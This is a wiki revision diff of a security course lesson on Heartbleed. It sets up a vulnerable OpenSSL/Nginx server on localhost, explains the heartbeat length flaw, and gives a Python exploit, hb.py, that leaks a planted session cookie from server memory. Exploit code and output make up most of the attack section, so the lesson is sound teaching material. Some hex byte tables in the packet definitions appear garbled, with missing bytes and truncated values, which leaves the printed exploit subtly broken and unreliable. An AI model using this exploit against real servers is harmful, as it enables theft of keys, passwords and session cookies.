Differences

This shows you the differences between two versions of the page.

--- session:extra:heartbleed-poc [2014/07/31 10:35]
vladum [Exploit]
+++ session:extra:heartbleed-poc [2020/07/19 12:49] (current)
@@ Line 1: / Line 1: @@
-= Extra - Heartbleed PoC
+====== 0x0Cb. Heartbleed Proof of Concept ======
-== Information Leak Attacks
+===== Information Leak =====
-== Environment Setup
+In the context of binary exploitation, information leakage attacks are based on bugs such as integers overflows, or unchecked bounds, and can be used to leak the memory contents of a process. Using this kind of attack we can overcome some protection mechanism that we just studied. We could leak stack canaries and then use them to successfully overflow the stack, or we could leak addresses from the stack or other structures, thus defeating ASLR.
-We are going to setup a minimal vulnerable environment to experiment with the exploit. We need a vulnerable OpenSSL version and a webserver. We also need to configure a basic website that will just serve a static page.
+More generally, this class of attacks includes any method that leads to the exposure of secret information (e.g., documents, keys). Besides software bugs, things like too much logging can also count as information leakage. For example, leaving the debug logging output of your web application can result in leaking paths on the hosting machine that can later be used in attacks.
-=== Download Nginx & OpenSSL
+A very famous and recent bug that leaks memory content is Heartbleed. The vulnerability was discovered in OpenSSL's code, and is a very trivial memory copy between 2 buffers with an unsanitized length parameter given as input by the user. Using this, the attacker can leak any secrets kept in a webserver's memory during operation, including, but not limited to:
+  * encryption keys
+  * passwords
+  * session cookies
+  * personal identifiable information (e.g., credit card numbers)
+This section will go through a Proof-of-Concept exploit that will enable us to leak a normal user's session cookie for a vulnerable server (localhost).
+===== Environment Setup =====
+To setup a minimal environment, we need a vulnerable OpenSSL version and a webserver. We also need to configure a basic website that will just serve a static page.
+==== Download Nginx & OpenSSL ====
   * [[https://www.openssl.org/source/openssl-1.0.1f.tar.gz|OpenSSL 1.0.1f Source]]
   * [[http://nginx.org/download/nginx-1.6.0.tar.gz|Nginx 1.6.0 Source]]
-=== Compile Nginx & vulnerable OpenSSL
+==== Compile Nginx & vulnerable OpenSSL ====
 <code bash>
@@ Line 40: / Line 51: @@
 **Continue from here if your Perl version is older than 5.18.X.**
+Note that we are only building Nginx, which will take care of running ''make'' in the OpenSSL directory for us.
 <code text>
@@ Line 59: / Line 72: @@
 </code>
-=== Basic SSL website
+==== Basic SSL website ====
 Prepare a self-signed certificate:
@@ Line 107: / Line 120: @@
 sudo chown vladum: /usr/share/nginx/www
 echo “Hello” > /usr/share/nginx/www/index.html
+</code>
+Start the server:
+<code bash>
+~$ ~/vuln/sbin/nginx
 </code>
 You should see the page live at https://127.0.0.1:11443. Ignore the certificate warning.
-== Vulnerability
+===== Vulnerability =====
 General information about this vulnerability can be obtained from [[http://heartbleed.com/|this website]].
-The TLS Heartbeat protocol extension (see [[http://tools.ietf.org/html/rfc6520|RFC 6520]] specifies a keep-alive functionality between a TLS client and server that uses 2 messages: a request and the response. The RFC mandates the following:
+The TLS Heartbeat protocol extension (see [[http://tools.ietf.org/html/rfc6520|RFC 6520]]) specifies a keep-alive functionality between a TLS client and server that uses 2 messages: a request and the response. The RFC mandates the following:
 <code text>
@@ Line 161: / Line 180: @@
 If the attacker sends a ''payload'', but a bogus, big, ''payload_length'', the vulnerable routine will copy past the end of the buffer and leak memory contents. Since the ''payload_length'' field is represented on 2 bytes, 64KB can be leaked.
-== Exploit
+===== Exploit =====
-The Heartbeat RFC
+A TLS channel is established after the initial handshake part of the protocol. Since the Heartbeat RFC specifies the a Heartbeat Request can be send at any time, we simply have to initiate a TLS connection with a ''ClientHello'' message (first step of the handshake), and the send the bogus Heartbeat Request.
+<note>
+More details about the TLS handshake protocol can be found [[http://blog.bjrn.se/2012/07/fun-with-tls-handshake.html|here]].
+</note>
+The ''ClientHello'' packet looks like this:
 <code text>
 03 02 00 31 # TLS Header
-00 00 2d # Handshake header
+00 00 2d    # Handshake header
-02 # ClientHello field: version number (TLS 1.1)
+02          # ClientHello field: version number (TLS 1.1)
-0b af bb b7 5a b8 3e f0 ab 9a e3 f3 9c 63 15 \
+0b af bb b7
-41 37 ac fd 6c 18 1a 24 60 dc 49 67 c2 fd 96 # ClientHello field: random
+a b8 3e f0 ab
-# ClientHello field: session id
+a e3 f3 9c 63
-04 # ClientHello field: cipher suite length
+ 33 41 37 ac
-33 c0 11 # ClientHello field: cipher suite(s)
+fd 6c 18 1a 24
-# ClientHello field: compression support, length
+dc 49 67 c2
-# ClientHello field: compression support, no compression (0)
+fd 96          # ClientHello field: random
-00 # ClientHello field: extension length (0)
+             # ClientHello field: session id
+04          # ClientHello field: cipher suite length
+33 c0 11    # ClientHello field: cipher suite(s)
+             # ClientHello field: compression support, length
+             # ClientHello field: compression support, no compression (0)
+00          # ClientHello field: extension length (0)
+</code>
+After sending this, we can read the server's response and send the payload, which looks like this:
+<code text>
+    # Content type = 18 (Heartbeat message)
+02 # Version
+03 # Packet length
+    # Heartbeat message type (1 = request)
+FF FF # Payload length
+      # There is no actual message, just an empty string
+</code>
+Exploit code:
+<file python hb.py>
+import socket
+import time
+CLIENT_HELLO = '''
+03 02 00 31 # TLS Header
+00 00 2d    # Handshake header
+02          # ClientHello field: version number (TLS 1.1)
+0b af bb b7
+a b8 3e f0 ab
+a e3 f3 9c 63
+ 33 41 37 ac
+fd 6c 18 1a 24
+dc 49 67 c2
+fd 96          # ClientHello field: random
+             # ClientHello field: session id
+04          # ClientHello field: cipher suite length
+33 c0 11    # ClientHello field: cipher suite(s)
+             # ClientHello field: compression support, length
+             # ClientHello field: compression support, no compression (0)
+00          # ClientHello field: extension length (0)
+'''
+BAD_HB = '''
+    # Content type = 18 (Heartbeat message)
+02 # Version
+03 # Packet length
+    # Heartbeat message type (1 = request)
+FF FF # Payload length
+      # There is no actual message, just an empty string
+'''
+def no_comments(p):
+    r = ''
+    next_line = False
+    for line in p.split('\n'):
+        for hexbyte in line.split(' '):
+            if len(hexbyte) == 0 or hexbyte[0] == '#':
+                next_line = True
+                break
+            r += hexbyte.decode('hex')
+        if next_line:
+            continue
+    return r
+def recvall(s, timeout=3):
+    s.setblocking(0)
+    total_data = []
+    data = ''
+    begin = time.time()
+    while True:
+        if total_data and time.time() - begin > timeout:
+            break
+        elif time.time() - begin > timeout * 2:
+            break
+        try:
+            data = s.recv(8192)
+            if data:
+                total_data.append(data)
+                begin = time.time()
+            else:
+                time.sleep(0.1)
+        except:
+            pass
+    return ''.join(total_data)
+def attack(host, port):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.send(no_comments(CLIENT_HELLO))
+    recvall(s)
+    s.send(no_comments(BAD_HB))
+    print recvall(s)
+attack('127.0.0.1', 11443)
+</file>
+To simulate a real life situation, we'll have to send a dummy request to the webserver from a //normal// user. Use the following file for this:
+<file python alice.py>
+import requests
+c = {
+    'session': 'ultr@_s3cr3t_c00kie'
+}
+requests.get('https://127.0.0.1:11443', cookies=c, verify=False)
+</file>
+Running ''alice.py'' will place a cookie in the webserver's memory that can be leaked with our exploit:
+<code bash>
+~$ python alice.py
+~$ python hb.py
+...
+ultr@_s3cr3t_c00kie
+...
 </code>
+Game over!

Security Summer School

User Tools

Site Tools

Differences

Page Tools